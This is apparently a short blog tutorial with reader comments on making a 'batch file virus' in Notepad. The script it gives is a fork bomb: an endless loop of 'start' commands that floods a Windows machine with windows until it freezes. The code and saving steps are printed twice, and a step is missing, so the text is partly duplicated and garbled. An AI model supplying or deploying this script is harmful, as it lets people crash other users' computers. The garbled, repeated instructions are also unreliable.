HOW TO CREATE A SIMPLE BATCH FILE VIRUS USING NOTEPAD
1. Press the windows key + R to open the Run command window
2. The run command window is displayed on the screen. Type in notepad and press enter to launch
3. Type in the folloing codes
@echo off
color 02
mode 1000
:name ::this can be set to any name
start
start
start
start
start
start
goto name
:: NOW LETS SAVE THIS 4. select file from the menu bar 5. select Save As from the file menu 7. double click on the file to launch PLEASE DONT FORGET TO LEAVE A COMMENT
color 02
mode 1000
:name ::this can be set to any name
start
start
start
start
start
start
goto name
:: NOW LETS SAVE THIS 4. select file from the menu bar 5. select Save As from the file menu 7. double click on the file to launch PLEASE DONT FORGET TO LEAVE A COMMENT
how I nearly crushed my hard disk.... thanks for the tuition
ReplyDeleteYhyh how does the code operate
Delete